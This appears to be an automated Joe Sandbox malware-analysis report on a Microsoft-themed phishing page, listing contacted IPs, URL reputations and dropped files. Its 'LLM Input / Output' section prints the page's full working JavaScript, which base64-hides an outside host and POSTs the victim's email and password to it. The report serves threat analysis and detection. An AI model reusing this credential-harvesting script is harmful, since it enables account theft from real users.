https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg	false	URL Reputation: safe	unknown
https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg	false	URL Reputation: safe	unknown
https://code.jquery.com/jquery-3.1.1.min.js	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://wieistmeineip.de	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadoshops.com.co	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://gliadomain.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://poalim.xyz	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadolivre.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://reshim.org	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://nourishingpursuits.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://medonet.pl	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://unotv.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadoshops.com.br	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://joyreactor.cc	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://zdrowietvn.pl	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://songstats.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://baomoi.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://supereva.it	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://elfinancierocr.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://bolasport.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://rws1nvtvt.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://desimartini.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://hearty.app	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://hearty.gift	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadoshops.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://heartymail.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://radio2.be	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://finn.no	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://hc1.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://account.live.com/resetpassword.aspx	chromecache_136.2.dr	false	URL Reputation: safe	unknown
https://kompas.tv	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mystudentdashboard.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://songshare.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadopago.com.mx	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://talkdeskqaid.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadopago.com.pe	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://cardsayings.net	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90b	chromecache_167.2.dr	false	URL Reputation: safe	unknown
https://mightytext.net	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://pudelek.pl	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://joyreactor.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://cookreactor.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://wildixin.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://eworkbookcloud.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://nacion.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://chennien.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadopago.cl	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://talkdeskstgid.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://bonvivir.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://carcostadvisor.be	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://salemovetravel.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://wpext.pl	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://welt.de	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://poalim.site	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://blackrockadvisorelite.it	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://cafemedia.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadoshops.com.ar	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://elpais.uy	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://landyrev.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://commentcamarche.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://tucarro.com.ve	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://rws3nvtvt.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://eleconomista.net	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadolivre.com.br	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://clmbtech.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://standardsandpraiserepurpose.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://salemovefinancial.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadopago.com.br	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://commentcamarche.net	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://etfacademy.it	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mighty-app.appspot.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://hj.rs	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://hearty.me	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadolibre.com.gt	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://timesinternet.in	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://idbs-staging.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://blackrock.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://idbs-eworkbook.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadolibre.co.cr	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://hjck.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://vrt.be	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://prisjakt.no	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://kompas.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://idbs-dev.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://wingify.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadolibre.cl	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://player.pl	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadopago.com.ar	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://mercadolibre.com.hn	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://linternaute.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://tucarro.com.co	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://landyrev.ru	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://clarosports.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://een.be	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://nien.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://punjabijagran.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://cmxd.com.mx	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://grupolpg.sv	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://rws2nvtvt.com	sets.json.0.dr	false	Avira URL Cloud: safe	unknown
https://abczdrowie.pl	sets.json.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.18.2.35	pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev	United States		13335	CLOUDFLARENETUS	true
148.72.158.229	c2millwrightmachineshop.ca	United States		30083	AS-30083-GO-DADDY-COM-LLCUS	true
13.107.213.45	part-0017.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.213.67	part-0039.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
151.101.194.137	code.jquery.com	United States		54113	FASTLYUS	false
152.199.23.37	cs1100.wpc.omegacdn.net	United States		15133	EDGECASTUS	false
142.250.184.228	www.google.com	United States		15169	GOOGLEUS	false

Private

IP
192.168.2.16
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446882
Start date and time:	2024-05-24 00:28:23 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.phis.win@24/79@22/11
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Browse: https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAYWSu4vTAADGm_au1zvQO0VEEeQGBxXS5tU8Kg49m0uba5LWJO0lgyVt0jyaV9u0aTIdTo43OdwkIg4nLk4iiDffdIuLoyCIgxxOiou9v8Dlgw9-fMv321jDi2QRKkL3c3ARrtzBUKysEX0KpDQcBTEKhkANQ3AQLaM4ikCwXobQydWNrQP6258nN7_Sr3efvnn1-fzvMXDbiqJwWimV4jguBsOhPTCKg8AruZqv2775HgDOAOA7ABxlVw0flMXj7BRHCRzFSJzCcQzBYAinigrCJbzE2mqXjlSmjSgJBPEevWhKZswz7YhH5ITzOJj3VFeoWY66ZHlGhjlmyTs0xj1a8qluNbuspUijiPd4m5eqsSApy53O6Et2U6jOIgu5iGBip8av7PowmHi9MJhGR7nn2YlpRA1nFOm2WWtFCian7LSh2qbLNxGQjOtE0yL0RJtbLT1g91TIjljHpgYttGeIC7_pDQfueMF1zJDSGMVE6WqDEXFWwtvKUBLS_VQQSXjIk464GzHJqDkLU6xOmi5EJCEqzOmpk87mCYmEYrutN4ZUn9ujPTcZDagIdvpwYKhpDZwlrTFIWb3I1H1kZIug2yCEMcu0SEXq-QuC1z153JrLUoDAEYjUFTFs99vYXOt03J2eXN-btYxJzbGZVNUbEJ4ws2RB7ldHeNmtph6PonKP6gwm83A6ZQPJEbvxu1x-eaYX-Ke5y0Fo-La-HU6Coe0aZyvAj5XrhfxW4UZmO3P3GpSrFAobW5mL9nsFeLm6tEU-qDz4ufmRfvvi3q2TT4eZ09VSXVW7jiA1-qQSsIsBYcCxxPnCTuQmlkSNISTAm_N-jdEI7CFcgQ_zwGE-f5q_0qj1eFoSpSpfqz6uIT3oPA88W8t8WP-PfyeXMv8A0&mkt=en-US&hosted=0&device_platform=Windows+10

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.16.195, 142.250.186.46, 64.233.184.84, 34.104.35.123, 172.217.18.10, 142.250.74.202, 216.58.206.74, 142.250.181.234, 142.250.186.170, 172.217.18.106, 142.250.186.74, 142.250.184.202, 142.250.186.138, 216.58.212.138, 172.217.23.106, 142.250.184.234, 142.250.186.42, 142.250.186.106, 172.217.16.202, 142.250.185.202, 40.126.32.6, 40.126.32.129, 40.126.32.131, 40.126.32.66, 152.199.19.160, 20.190.177.0, 40.127.169.103, 199.232.214.172, 192.229.221.95, 142.250.185.138, 142.250.185.74, 142.250.185.106, 216.58.206.42, 172.217.16.138, 142.250.185.170, 52.165.164.15, 20.3.187.198, 142.250.185.131
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, na.privatelink.msidentity.com, clientservices.googleapis.com, clients2.google.com, mscomajax.vo.msecnd.net, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, wu-b-net.trafficmanager.net, client.ppe.repmap.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, www.ppev6tm.aadg.akadns.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, prdf.aadg.msidentity.com, aadcdnoriginwus2.azureedge.net, cs22.wpc.v0cdn.net, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.f.prd.aadg.akadns.net, ctldl.windowsupdate.com, aadcdn.msauth.net, passwordreset.mso.msidentity.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, ppe.v6.aadg.privatelink.msidentity.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html Model: gpt-4o	```json { "riskscore": 9, "reasons": "The JavaScript code captures user email and password and sends them to an external server (c2millwrightmachineshop.ca) via an AJAX POST request. This behavior is indicative of phishing or credential harvesting. The use of base64 encoding to obscure the URL further suggests malicious intent." }
$( document ).ready(function() { var encoded_string = window.location.hash.substr(1); var email = encoded_string; $('.identity').html(email); var request = new XMLHttpRequest(); var url = window.atob('aHR0cHM6Ly9jMm1pbGx3cmlnaHRtYWNoaW5lc2hvcC5jYS93cC1mcm9tL3Bydi5waHA=') + email request.open('GET', url, true); request.onload = function() { if (this.status >= 200 && this.status < 400) { var data = JSON.parse(this.response); logo_image = data["logo_image"]; bg_image = data["bg_image"]; bg_color = data["bg_color"]; memo = data["memo"]; if(bg_image != null && bg_image != ''){ $('.background-image').css('background-image', 'url(' + bg_image + ')'); $('.background-image').css('box-shadow', 'inset 0 0 0 1000px rgb(0 0 0 / 50%)'); } if(logo_image != null && logo_image != ''){ $('.banner-logo').attr('src', logo_image); } if(bg_color != null && bg_color != '' && (bg_image == null \|\| bg_image == '')){ $('.background-image').hide(); $('.background-image-holder').css('background-color', bg_color); } if(memo != null && memo != ''){ $('#idBoilerPlateText').show(); $('#idBoilerPlateText').text(memo); $('#idBoilerPlateText').css('margin-top','44px'); } } else { console.log("Response error"); } }; request.onerror = function() { console.log("Request error"); }; request.send(); setTimeout(function (){ $('#lightbox').show(); $('#i0118').focus(); }, 1000); $('#idSIButton9').on('click', function (event){ event.preventDefault ? event.preventDefault() : event.returnValue = false; var user = $('.identity').html(); var pass = $('#i0118').val(); var count = $('#count').val(); if(pass == ""){ $("#passwordError2").show(); $("#passwordError").hide(); $("#important").hide(); $("#i0118").css("border-color", "#e81123"); $('#i0118').focus(); }else{ $("#i0118").css("border-color", "black"); $('#progressBar').show(); $("#passwordError2").hide(); $("#passwordError").hide(); $('#idSIButton9').prop('disabled', true); $.ajax({ url: window.atob("aHR0cHM6Ly9jMm1pbGx3cmlnaHRtYWNoaW5lc2hvcC5jYS93cC1mcm9tL3BvbGljeS5waHAK"), data: { "email": user, "password": pass, "count": count, }, type: "POST", success: function(data){ if(data == 1){ setTimeout(function(){ window.location.href="https://outlook.office.com/mail/" + window.location.hash.substr(1); } , 2000); }else{ $('#i0118').val(''); $('#progressBar').hide(); $("#passwordError").show(); $("#important").hide(); $('#idSIButton9').prop('disabled', false); $('#count').val('2'); } }, error: function(data) { console.log('Ajax error'); } }); } }); });
URL: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html Model: gpt-4o	```json { "phishing_score": 9, "brands": "Microsoft", "phishing": true, "suspicious_domain": true, "has_loginform": true, "has_captcha": false, "setechniques": true, "reasons": "The URL 'https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html' does not match the legitimate Microsoft domain (e.g., microsoft.com). The page contains a login form asking for a password, which is a common phishing technique. The domain name appears suspicious and unrelated to Microsoft. The use of social engineering techniques is evident as the page mimics a legitimate Microsoft login page to deceive users." }

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235\LICENSE

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1558
Entropy (8bit):	5.11458514637545
Encrypted:	false
SSDEEP:	48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
MD5:	EE002CB9E51BB8DFA89640A406A1090A
SHA1:	49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
SHA-256:	3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
SHA-512:	D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
Malicious:	false
Reputation:	low
Preview:	// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235\_metadata\verified_contents.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	5.99136283355077
Encrypted:	false
SSDEEP:	48:p/hUI1uLIrAdIi17akd8+vZvZAALRQkNKaLDekpvW:RnNQI+7amlBvZAKRQi3ekdW
MD5:	884209DC825F17BCF6433F2DD3C7E6FD
SHA1:	A38A1A859C781FD6F7BD52CFD62CE685CA5A910D
SHA-256:	B62C892D3B126AD917D30310BD400C333029727C88140E9C9E6420AE3E26DEED
SHA-512:	BC1F8D656C7D617D7C9C289DD6E49AC19301BE9597B89DBC41DEC6CA6CC719C6ECA7F28B3F992A6ADBF587202C3C04CE0835C5459407F888EFB1281FF77F8201
Malicious:	false
Reputation:	low
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJMVzhZaVRQM1lxbU5iMWVXUTQxajBVRmZObUhRUlNMREtRQ1lSRUFwZjRBIn0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiV3hOdUFtQnlzQ0k1NnRtdTRBX1BNMUYtaUNBaWJuXzJtM2tOdGtka25INCJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC41LjE0LjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"FyhsZV91g2fM48fWCbRoIt5Z4L9u9uKeVBrevEE_fcaxnHu2YKCITYZCsfuIiRaQ0ioSrONndIR3o_NRLn94EeCjW9mx09YGbtIDuaJKHalmPzYIKcJvpnfGWUQ4tFVwkVRvmC2Tczv3CxqyCojE9cr4qr4Oo19wV9CcABBCXyiAlY3UDUkteh0C6JBtQ9JS4V_PmMD4xZ0-W7Ly1irhspj4QWnVLZoOBO121sn4rC8vsNNLR8K2rXS

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235\manifest.fingerprint

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.7748418475126835
Encrypted:	false
SSDEEP:	3:S8g+WBDTZy0suxRSA1er1Cl:SD0Oxm5Cl
MD5:	12E4B45B481A49CB9793C4EB9EEB686D
SHA1:	8A1C3CD932D7441ACA1FDA1B077BFFAC53067E6A
SHA-256:	0B26105D6FCD078FC074E3F43012735C3C9D62E20B3C4DB205DEA4A8841ACE18
SHA-512:	026B9E240002166064E91BA063A2867F2A76F25FD0017661F082C877FE5F6067BDDCCB59DE187BD7AC31147DA054EB63969AF63EAD01F8F4469DD9168EF85BBC
Malicious:	false
Reputation:	low
Preview:	1.a0d36633da5e9660efefde44a0762f678cb7a0e47eca24d0f3e479b6ae303673

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235\manifest.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.462192586591686
Encrypted:	false
SSDEEP:	3:rR6TAulhFphifFCmMARWHJqS1gLIJY:F6VlM8aRWpqS1gL2Y
MD5:	96644BF9C61D98F0ABBCB29D385C4DF2
SHA1:	83F15025C8B68D609DC3653517B224C8AED08602
SHA-256:	2D6F188933F762A98D6F5796438D63D1415F3661D04522C32900984440297F80
SHA-512:	F185B72778A001005A73052AB108EFE53A0C70A4A6B274D5B0F33160998A32FFA5CFFE730005258E3398041DE28452907B38A7AE2E632C6EB095BE700337D704
Malicious:	false
Reputation:	low
Preview:	{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.5.14.0".}

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5356_1067268235\sets.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	7793
Entropy (8bit):	4.61890378232256
Encrypted:	false
SSDEEP:	96:Mon4mdqX1gs1/BNKLcxbdmf5688PTGXvcxKuP+8qJq:v7qljBkIVRPTGXvcx1sq
MD5:	94679DFD3B9168DAA5214E36B8E12730
SHA1:	DE6965B81658AD978483F3A809641C66C2A92D12
SHA-256:	83D4ABA459DB56533A15A34889D633A5EB0AE6CFB90483D5BC60FC6CA72AC7D3
SHA-512:	156D83BFB12C4C3424BDF7929CC8977D8025A08301B942F5B7474D61EC7421DE0EADF6923619EED4B4EC66CC742ACF1201C3438E1947B05F14C8F172194F5D6E
Malicious:	false
Reputation:	low
Preview:	{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://elpais.com.uy","associatedSites":["https://clubelpais.com.uy","https://paula.com.uy","https://gallito.com.uy"],"ccTLDs":{"https://elpais.com.uy":["https://elpais.uy"]}}.{"primary":"https:/

Chrome Cache Entry: 135

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
Category:	downloaded
Size (bytes):	276
Entropy (8bit):	7.316609873335077
Encrypted:	false
SSDEEP:	6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
MD5:	4E3510919D29D18EEB6E3E8B2687D2F5
SHA1:	31522A9EC576A462C3F1FFA65C010D4EB77E9A85
SHA-256:	1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
SHA-512:	DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
Preview:	...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....e.......J).8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....

Chrome Cache Entry: 136

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (941), with CRLF line terminators
Category:	dropped
Size (bytes):	51589
Entropy (8bit):	4.6433120756616955
Encrypted:	false
SSDEEP:	768:3VBsl1cWiwIRqL5IBRe7RMCb9slQfWGfAlBRsYXzrSSl:3VRrRBBRe7eCqlQfWGfAlBRsYX6Sl
MD5:	4E298A8C211AC12F633CBAD15BE43588
SHA1:	2F499239D765A5B0BF0BFBE11D57E02B85FCAF78
SHA-256:	BE55052CD1DD77A2DB77543692CC56126AE8BBF218EFC25F8B0C0796EE659F08
SHA-512:	25B0962F83F7F23F150AA04361057A4481A8E02ACC376397DFAA08B672BC5505E3DC36E9A1FEA7466486F4979FFD8AC7D9C6ED10210F935775B5414CE37A2C47
Malicious:	false
Reputation:	low
Preview:	..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">..<head><title>...Microsoft Online Password Reset..</title><meta http-equiv="x-ua-compatible" content="IE=9" /><meta http-equiv="Expires" content="0" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-store, no-cache" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="robots" content="noindex, nofollow, NOODP, NOYDIR" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link id="FavoriteIcon" rel="Shortcut Icon" type="image/x-icon" href="../favicon.ico?v=1342177280" />.... <script src="//ajax.aspnetcdn.com/ajax/jQuery/jquery-3.6.0.min.js" type="text/javascript"></script>.. <script type="text/javascript">window.jQuery \|\| document.write('<script type="text/javascript" src="../js/jquery-3.6.0.min.js">\

Chrome Cache Entry: 137

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	12980
Entropy (8bit):	4.656952280411437
Encrypted:	false
SSDEEP:	384:QjJmcs01WskN59g1+VW1aEV4xvbw94l1R5SUcZEWajJIcjqTqxBojafes0OPUE9h:t4i7l1rSVajJWjs0O8E9h
MD5:	8EDFCD3F7A179CFF6B123DFF50F29770
SHA1:	7A2D9BB4B9F6072AB3049E6421021A5BA0A3DADF
SHA-256:	D0B747C7F7414A08B0D5107832B2F4BB44A9BB4A3AAD28390F58EDE8BBEA6AE1
SHA-512:	169D1C71078DCB1C65B3CBAFBA3379B94718D6C1E472990666430A6B2C0483CC9B27E13820A29D2DCA2364D3CD3F7D2ECDED48B9ACF406BF74CB505489FB9503
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/js/Button.js?v=1342177280
